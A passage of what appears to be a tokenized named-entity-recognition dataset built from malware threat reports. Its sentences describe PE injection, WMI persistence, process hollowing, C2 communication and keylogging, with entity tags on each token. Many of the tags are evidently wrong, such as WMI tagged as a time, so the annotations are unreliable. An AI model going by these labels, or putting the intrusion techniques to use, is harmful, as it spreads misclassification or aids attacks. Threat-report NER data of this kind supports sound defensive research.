[ "O", "O" ] }, { "tokens": [ "the", "embedded", "files", "in", "the", "scripts" ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "These", "scripts", "contain", "an", "embedded", "PE", "loader", "to", "execute", "an", "embedded", "malware", "payload." ], "ner_tags": [ "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "the", "embedded", ".NET", "injector" ], "ner_tags": [ "O", "O", "B-SamFile", "O" ] }, { "tokens": [ "which", "in", "turn", "injects", "the", "payload(s)", "into", "its", "own", "or", "a", "remote", "process." ], "ner_tags": [ "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "contains", "the", "ability", "to", "inject", ".NET", "assemblies", "into", "unmanaged", "processes." ], "ner_tags": [ "O", "O", "O", "O", "B-Features", "B-Way", "B-Features", "O", "O", "O" ] }, { "tokens": [ "the", "payload", "is", "either", "loaded", "into", "its", "own", "process", "or", "a", "remote", "one." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "remote", "process", "the", "payload", "gets", "injected", "to." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "the", "second", "option", "is", "used", "with", "the", "PID", "of", "explorer.exe", "to", "load", "the", "ComRAT", "payload", "reflectively", "into", "the", "process." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "the", "injector", "is", "its", "ability", "to", "load", "an", "assembly", "into", "an", "unmanaged", "process." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "to", "load", "an", "assembly", "into", "an", "unmanaged", "process." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "method", "InjectAssembly", "is", "used", "to", "inject", "a", ".NET", "assembly", "into", "a", "native", "process" ], "ner_tags": [ "O", "O", "B-Way", "O", "O", "O", "B-Features", "I-Features", "B-Way", "B-Features", "O", "O", "O", "O" ] }, { "tokens": [ "Function", "and", "variable", "names", "are", "obfuscated" ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Strings", "are", "encrypted" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "scripts", "are", "obfuscated", "to", "prevent", "easy", "detection." ], "ner_tags": [ "B-Tool", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Decoded", "IronPython", "script" ], "ner_tags": [ "O", "B-Way", "O" ] }, { "tokens": [ "the", "Rijndael", "decryption", "key", "is", "passed." ], "ner_tags": [ "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "get", "decoded", "and", "decrypted" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "The", "decryption", "key", "is", "passed", "as", "an", "argument" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "full-blown", "PE", "injection", "tools", "able", "to", "load", "a", "native", "x86/64", "payload", "reflectively", "into", "a", "remote", "process." ], "ner_tags": [ "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "B-Tool", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "PowerShell", "Empire’s", "ReflectivePEInjection", "script" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "The", "method", "Invoke", "is", "used", "to", "inject", "a", "native", "PE", "into", "a", "remote", "process", "and", "InvokeVoid", "to", "call", "any", "exported", "function", "of", "the", "injected", "payload." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "As", "a", "command", "line", "argument" ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "Windows", "task", "XML", "file" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "The", "task", "is", "used", "to", "start", "an", "IronPython", "script" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "The", "task’s", "description", "is", "PythonUpdateSrvc", "and", "it", "runs", "either", "on", "Windows", "startup", "when", "a", "user", "logs", "in", "or", "when", "one", "of", "two", "system", "events", "get", "created:" ], "ner_tags": [ "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "the", "Windows", "task", "XML" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "The", "task", "file", "is", "then", "used", "to", "create", "a", "task", "which", "in", "turn", "starts", "a", "script", "when", "triggered." ], "ner_tags": [ "O", "I-SamFile", "I-SamFile", "O", "O", "O", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "a", "Windows", "task", "XML", "to", "start" ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "the", "submitter", "collected", "the", "files", "from", "different", "places" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "This", "is", "accomplished", "with", "a", "native", "bootstrapper", "DLL,", "which", "gets", "injected", "into", "the", "remote", "process", "and", "prepares", "it", "so", "a", ".NET", "assembly", "can", "be", "injected", "afterwards." ], "ner_tags": [ "O", "O", "O", "O", "O", "I-Tool", "B-Way", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O" ] }, { "tokens": [ "DLL", "gets", "injected" ], "ner_tags": [ "B-SamFile", "O", "O" ] }, { "tokens": [ "The", "output", "is", "then", "parsed", "to", "the", "targeted", "process", "ID", "with", "the", "help", "of", "tasklist", "filters." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Contains", "the", "imported", "unmanaged", "function", "declarations", "and", "win32", "structures/constants." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "being", "able", "to", "use", "the", ".NET", "framework", "APIs", "directly", "from", "Python." ], "ner_tags": [ "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "can", "use", ".NET", "framework", "APIs" ], "ner_tags": [ "O", "O", "B-SamFile", "O", "O" ] }, { "tokens": [ "use", "of", "the", ".NET", "framework", "APIs" ], "ner_tags": [ "O", "O", "O", "B-SamFile", "O", "O" ] }, { "tokens": [ "when", ".NET", "framework", "APIs", "are", "used", "in", "the", "code" ], "ner_tags": [ "O", "B-SamFile", "I-SamFile", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "use", "of", "WMI", "to", "both", "store", "and", "persist", "the", "backdoor" ], "ner_tags": [ "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Windows", "Management", "Instrumentation", "(WMI)." ], "ner_tags": [ "O", "O", "B-SecTeam", "B-Way" ] }, { "tokens": [ "to", "use", "WMI", "for", "storage", "and", "persistence." ], "ner_tags": [ "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "WMI", "provides", "many", "administrative", "capabilities", "on", "local", "and", "remote", "systems,", "including", "querying", "system", "information,", "starting", "and", "stopping", "processes,", "and", "setting", "conditional", "triggers." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Features", "I-Features", "O", "B-Features", "O", "I-Features", "O", "O", "I-Features", "I-Features", "B-HackOrg" ] }, { "tokens": [ "WMI", "can", "be", "accessed", "using", "a", "variety", "of", "tools,", "including", "the", "Windows", "WMI", "Command-line", "(wmic.exe),", "or", "through", "APIs", "accessible", "to", "programming", "and", "scripting", "languages", "such", "as", "PowerShell." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-SamFile", "B-SecTeam", "B-SecTeam", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "WMI", "permanent", "event", "subscriptions", "can", "be", "used", "to", "trigger", "actions", "when", "specified", "conditions", "are", "met." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Subscriptions", "consist", "of", "three", "core", "WMI", "classes:", "a", "Filter,", "a", "Consumer,", "and", "a", "FilterToConsumerBinding." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "B-Tool", "O", "O", "B-Way" ] }, { "tokens": [ "WMI", "Consumers", "specify", "an", "action", "to", "be", "performed,", "including", "executing", "a", "command,", "running", "a", "script,", "adding", "an", "entry", "to", "a", "log,", "or", "sending", "an", "email" ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Features", "O", "B-Way", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Creating", "a", "WMI", "permanent", "event", "subscription" ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "WMI", "Filters", "define", "conditions", "that", "will", "trigger", "a", "Consumer,", "including", "system", "startup,", "the", "execution", "of", "a", "program," ], "ner_tags": [ "B-Time", "B-SecTeam", "O", "O", "O", "O", "O", "O", "O", "O", "B-Features", "O", "O", "B-Features", "O", "O", "O" ] }, { "tokens": [ "then", "created", "a", "WMI", "event", "subscription", "in", "order", "to", "execute", "the", "backdoor" ], "ner_tags": [ "O", "O", "O", "B-Time", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "use", "WMI", "to", "persist", "a", "backdoor", "and", "also", "store", "the", "PowerShell", "backdoor", "code." ], "ner_tags": [ "O", "B-Way", "O", "O", "O", "O", "O", "O", "B-Features", "O", "B-HackOrg", "B-HackOrg", "O" ] }, { "tokens": [ "created", "a", "new", "WMI", "class", "and", "added", "a", "text", "property", "to", "it", "in", "order", "to", "store", "a", "string", "value." ], "ner_tags": [ "O", "O", "O", "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Features", "I-Features", "I-Features", "O" ] }, { "tokens": [ "The", "WMI", "component", "of", "the", "POSHSPY", "backdoor", "leverages", "a", "Filter", "to", "execute", "the", "PowerShell", "component", "of", "the", "backdoor", "on", "a", "regular", "basis." ], "ner_tags": [ "O", "B-Way", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "WMI", "Component" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "“BfeOnServiceStartTypeChange”", "WMI", "Query", "Language", "(WQL)", "filter", "condition", "The", "BfeOnServiceStartTypeChange", "Filter", "was", "bound", "to", "the", "CommandLineEventConsumer", "WindowsParentalControlsMigration." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "legitimate", "WMI", "persistence" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "attacker", "use", "of", "WMI" ], "ner_tags": [ "B-HackOrg", "O", "O", "B-Way" ] }, { "tokens": [ "WMI", "persistence." ], "ner_tags": [ "B-Time", "O" ] }, { "tokens": [ "decrypted,", "and", "executed", "the", "backdoor", "code" ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Decoded", "CommandLineTemplate", "PowerShell", "code" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "wrote", "the", "encrypted", "and", "base64-encoded", "PowerShell", "backdoor", "code" ], "ner_tags": [ "O", "O", "O", "O", "O", "B-Way", "B-Tool", "O" ] }, { "tokens": [ "base64-encoded", "PowerShell", "command." ], "ner_tags": [ "O", "B-Way", "B-Tool" ] }, { "tokens": [ "executing", "PowerShell", "code", "as", "an", "EncodedCommand" ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "to", "download", "and", "execute", "additional", "PowerShell", "code", "and", "Windows", "binaries" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Downloading", "and", "executing", "PowerShell", "code" ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "Encrypting", "communications", "using", "AES", "and", "RSA", "public", "key", "cryptography" ], "ner_tags": [ "O", "B-Idus", "O", "B-Way", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "Writing", "executables", "to", "a", "randomly-selected", "directory", "under", "Program", "Files,", "and", "naming", "the", "EXE", "to", "match", "the", "chosen", "directory", "name" ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Appending", "a", "file", "signature", "header", "to", "all", "encrypted", "data," ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "appended", "file", "headers", "used", "to", "bypass", "content", "inspection", "made", "this", "backdoor", "difficult", "to", "identify" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Word", "document", "lure", "requesting", "the", "user", "to", "run", "the", "VBA", "macro." ], "ner_tags": [ "I-SamFile", "I-SamFile", "I-SamFile", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "When", "opened,", "the", "user", "sees", "a", "social", "engineering", "image", "telling", "them", "that", "they", "must", "click", "the", "“Enable", "editing”", "button", "to", "see", "the", "document’s", "contents." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "I-Idus", "I-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Packed", "DLL", "analysis" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "packing", "being", "used", "to", "obfuscate", "the", "malware." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "there", "is", "indeed", "some", "sort", "of", "unpacking", "happening." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Although", "the", "unpacking", "procedure", "happens", "in", "multiple", "steps" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "As", "soon", "as", "the", "unpacked", "executable", "is", "running" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "An", "Examination", "of", "its", "Unpacking", "Routine" ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "its", "unpacking", "routine" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "Once", "the", "“.tmp”", "file", "is", "found,", "it", "is", "moved", "and", "renamed", "to", "the", "Office", "templates", "folder" ], "ner_tags": [ "O", "O", "B-SamFile", "I-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "loaded", "using", "rundll32.exe." ], "ner_tags": [ "O", "O", "B-SamFile" ] }, { "tokens": [ "As", "a", "second", "argument,", "the", "macro", "passes", "the", "entry", "function", "“DllUnregisterServer”", "to", "rundll32.exe", "so", "that", "the", "execution", "starts", "correctly." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "B-SamFile", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "runs", "rundll32.exe", "to", "load", "the", "malware." ], "ner_tags": [ "O", "B-SamFile", "O", "O", "O", "O" ] }, { "tokens": [ "executes", "it", "using", "rundll32.exe" ], "ner_tags": [ "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "Looking", "at", "the", "decrypted", "data" ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "the", "decryption", "process", "starts" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "data", "that", "will", "be", "decrypted" ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "algorithm", "to", "decrypt", "the", "data", "is", "simple." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "the", "second", "decryption", "stage", "occurs" ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "the", "decrypted", "memory", "structure" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "Before", "the", "decryption", "starts" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "contains", "the", "decryption", "algorithm", "for", "the", "second", "stage" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "output", "of", "this", "decryption" ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "decryption", "algorithm" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "the", "executable", "code", "used", "to", "decrypt", "the", "encrypted", "data" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "After", "successfully", "decrypting", "the", "C2", "URLs" ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "all", "the", "decrypted", "C2", "URLs" ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "the", "malware", "calls", "a", "decryption", "function" ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Although", "the", "decoding", "algorithm", "of", "the", "C2", "response", "looks", "quite", "complex,", "it", "is", "actually", "Base64", "decoding,", "followed", "by", "an", "XOR", "operation", "using", "the", "key", "0x7A." ], "ner_tags": [ "O", "O", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "decryption", "function." ], "ner_tags": [ "B-HackOrg", "O" ] }, { "tokens": [ "can", "be", "decrypted", "to", "an", "active", "malware", "download", "server" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "API", "function", "located", "at", "the", "beginning", "of", "the", "memory", "section", "are", "resolved", "using", "GetProcAddress" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Windows", "API", "functions" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "Windows", "API", "functions" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "After", "resolving", "the", "functions" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "The", "names", "of", "Windows", "API", "functions", "are", "stored", "in", "the", "first", "150", "bytes" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "several", "Windows", "API", "functions", "are", "resolved", "using", "GetProcAddress" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "memory", "structure", "contains", "executable", "code." ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "Data", "view", "of", "the", "section", "containing", "the", "encrypted", "malware." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "area", "after", "this", "contains", "encrypted", "data." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Structure", "of", "the", "encrypted", "section." ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "encrypted", "URLs", "contained", "in", "the", "malware", "itself." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "the", "encrypted", "data" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "This", "technique", "is", "called", "self-injection", "or", "PE", "overwrite" ], "ner_tags": [ "O", "O", "O", "O", "B-Way", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "This", "function", "obtains", "the", "username," ], "ner_tags": [ "O", "O", "B-Features", "I-Features", "O" ] }, { "tokens": [ "the", "computer", "name", "and", "the", "domain", "of", "infected", "system." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "the", "computer", "architecture" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "generated", "based", "on", "the", "computer", "architecture." ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "subsequent", "functions", "collect", "additional", "information", "such", "as", "the", "machine’s", "public", "IP", "address" ], "ner_tags": [ "O", "O", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "To", "determine", "the", "command", "and", "control", "(C2)", "servers", "waiting", "for", "the", "data", "to", "be", "sent", "to,", "the", "malware", "calls", "a", "decryption", "function", "that", "uses", "the", "RC4", "algorithm" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "After", "successfully", "decrypting", "the", "C2", "URLs,", "the", "data", "is", "sent", "there", "using", "a", "HTTP", "POST", "request", "adding", "the", "constructed", "query", "string", "as", "data" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "making", "a", "HTTP", "GET", "request" ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "the", "malware", "initiates", "a", "download,", "which", "delivers", "an", "executable" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Its", "main", "purpose", "is", "to", "download", "and", "execute", "a", "second", "stage", "malware", "payload" ], "ner_tags": [ "O", "O", "O", "O", "O", "B-Features", "O", "B-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Thread", "Execution", "Hijacking" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "Thread", "Execution", "Hijacking" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "The", "final", "execution", "method", "Hancitor", "supports", "is", "Thread", "Execution", "Hijacking." ], "ner_tags": [ "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "only", "difference", "is", "that", "the", "malware", "replaces", "the", "thread", "context", "with", "the", "downloaded", "executable", "and", "resumes", "it", "afterwards." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "I-Features", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Process", "Hollowing" ], "ner_tags": [ "O", "B-SecTeam" ] }, { "tokens": [ "Process", "Hollowing" ], "ner_tags": [ "O", "B-SecTeam" ] }, { "tokens": [ "If", "the", "Process", "Hollowing", "method", "is", "used,", "a", "new", "svchost.exe", "process", "is", "created", "in", "a", "suspended", "state." ], "ner_tags": [ "O", "O", "I-Way", "O", "O", "O", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "malware", "then", "allocates", "new", "memory", "in", "the", "newly-created", "process,", "writes", "the", "executable", "to", "it", "and", "executes", "it", "in", "a", "new", "thread." ], "ner_tags": [ "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Process", "Injection", "method" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "the", "malware", "was", "distributed", "as", "email", "Word", "document", "attachments" ], "ner_tags": [ "O", "O", "O", "O", "O", "B-Way", "B-Tool", "B-SamFile", "B-Way" ] }, { "tokens": [ "then", "recursively", "searches", "through", "all", "local", "temp", "folders." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Query", "string", "containing", "system", "information", "before", "being", "sent", "to", "the", "C2." ], "ner_tags": [ "B-SamFile", "I-SamFile", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "backdoor", "uses", "domain", "fronting", "to", "obfuscate", "its", "true", "C2", "server" ], "ner_tags": [ "O", "O", "O", "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "fronted", "domain", "is", "configured", "by", "an", "earlier", "stage", "of", "execution", "and", "the", "actual", "domain", "is", "hard-coded", "in", "the", "backdoor." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "PowerShell", "initiated", "the", "first", "connection", "to", "the", "fronted", "domain" ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "communicates", "with", "its", "C2", "server", "using", "HTTPS" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "its", "C2", "server", "consists", "of", "JSON", "data", "exchanged", "via", "HTTP", "POST", "requests." ], "ner_tags": [ "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "HTTP", "POST", "request", "that", "contains", "the", "command", "output." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "C2", "server", "via", "a", "subsequent", "HTTP", "POST", "request" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "its", "C2", "server", "via", "a", "subsequent", "HTTP", "POST", "request." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "its", "C2", "server", "every", "five", "seconds", "via", "HTTP", "POST", "requests." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "backdoor", "that", "supports", "commands,", "including", "screen", "capture" ], "ner_tags": [ "O", "O", "O", "O", "O", "I-Features", "I-Features" ] }, { "tokens": [ "Upload", "a", "screen", "capture" ], "ner_tags": [ "B-Features", "I-Features", "I-Features", "O" ] }, { "tokens": [ "keystroke", "capture" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "The", "backdoor", "writes", "captured", "keystrokes", "to", "memory" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "continuously", "captures", "keystrokes" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "the", "keylogging", "utility" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "This", "attacker", "utilized", "an", "additional", "keylogging", "utility" ], "ner_tags": [ "O", "B-HackOrg", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "keylogging", "utility", "was", "configured", "to", "capture", "and", "record", "keystrokes", "to", "C:\\ProgramData\\psh\\System32Log.txt." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "I-Features", "I-Features", "I-Features", "B-HackOrg", "O", "O" ] }, { "tokens": [ "Keylogger", "Deployment" ], "ner_tags": [ "B-Way", "O" ] }, { "tokens": [ "keylogger" ], "ner_tags": [ "B-SamFile" ] }, { "tokens": [ "The", "backdoor", "may", "also", "download", "and", "execute", "additional", "PowerShell", "commands", "from", "its", "command", "and", "control", "(C2)", "server." ], "ner_tags": [ "O", "B-SamFile", "O", "O", "B-Features", "O", "I-Features", "I-Features", "B-HackOrg", "B-Features", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Downloaded", "VBScript", "and", "PowerShell" ], "ner_tags": [ "B-SamFile", "B-SecTeam", "O", "O" ] }, { "tokens": [ "a", "PowerShell", "script", "block", "was", "executed", "to", "download" ], "ner_tags": [ "O", "B-Tool", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "PowerShell", "to", "connect", "to", "third-party", "file", "sharing", "sites", "to", "download", "the", "UltraVNC", "application" ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "PowerShell", "to", "connect", "to", "third-party", "file", "sharing", "sites", "to", "download", "an", "NGROK", "utility" ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "use", "UltraVNC", "to", "download", "two", "LNK", "files" ], "ner_tags": [ "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "used", "UltraVNC", "to", "download", "an", "in-memory", "dropper" ], "ner_tags": [ "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "using", "UltraVNC", "to", "download", "and", "store", "a", "file" ], "ner_tags": [ "O", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "deployed", "additional", "tools" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "The", "Data", "field", "may", "contain", "RC4-encrypted,", "Base64-encoded", "command" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "backdoor", "uses", "an", "RC4", "key", "configured", "by", "an", "earlier", "stage", "of", "execution", "to", "encrypt", "and", "decrypt", "the", "Data", "field" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Features", "O", "B-HackOrg", "O", "O", "O" ] }, { "tokens": [ "observed", "the", "RC4", "key", "UwOdHsFXjdCOIrjTCfnblwEZ", "used", "for", "RC4", "encryption", "and", "decryption." 